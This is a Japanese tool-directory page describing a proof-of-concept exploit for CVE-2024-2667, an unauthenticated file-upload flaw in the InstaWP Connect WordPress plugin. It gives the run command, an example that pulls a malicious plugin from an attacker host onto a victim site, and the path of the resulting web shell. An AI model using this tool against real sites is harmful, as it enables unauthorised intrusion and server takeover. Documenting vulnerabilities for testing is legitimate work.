Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/nxploited/cve-2024-2667-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

CVE-2024-2667のPoCエクスプロイト:InstaWP Connect WordPressプラグインのREST APIエンドポイントにおける不十分なファイル検証を介した、自動化された任意ファイルアップロードとシェルアクセス。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-2667-Poc 🚀

説明

WordPress用プラグイン「InstaWP Connect – 1-click WP Staging & Migration」は、/wp-json/instawp-connect/v1/config REST APIエンドポイントにおけるファイル検証が不十分なため、バージョン0.1.0.22以前の全バージョンにおいて任意ファイルのアップロードが可能です。これにより、認証されていない攻撃者が任意のファイルをアップロードできる可能性があります。

スクリプト使用ガイド ⚙️

要件のインストール

説明詳細アイコン
必要なライブラリのインストールpip を使用して必要なPythonライブラリ(requests および beautifulsoup4)をインストールします。🛠️
インストールコマンド実行: pip install requests beautifulsoup4。📥

スクリプトの実行

説明詳細アイコン
スクリプトの実行必要な引数を指定して、コマンドラインでスクリプトを実行します。🚀
必須引数- -up: プラグインのURL(例: http://attacker-domain/malicious-plugin.zip)。
- -u: ターゲットのWordPress URL(例: http://victim-domain/)。🔧
コマンド例python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜

脆弱性の確認

説明詳細アイコン
バージョンチェックスクリプトは、対象プラグインのバージョンを readme.txt ファイルで確認します。🔍
脆弱なバージョンバージョンが <= 0.1.0.22 の場合、スクリプトは次のように出力します: The site is vulnerable.⚠️
安全なバージョンバージョンが > 0.1.0.22 の場合、スクリプトは次のように出力します: The site is not vulnerable.✅

シェルの場所

説明詳細アイコン
シェルのパスアップロードが成功した場合、シェルは次の場所でアクセス可能です:🐚
wp-content/plugins/instawp-connect/shell.php。

使用法 -help

root@kitploit:~
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
ツールをダウンロード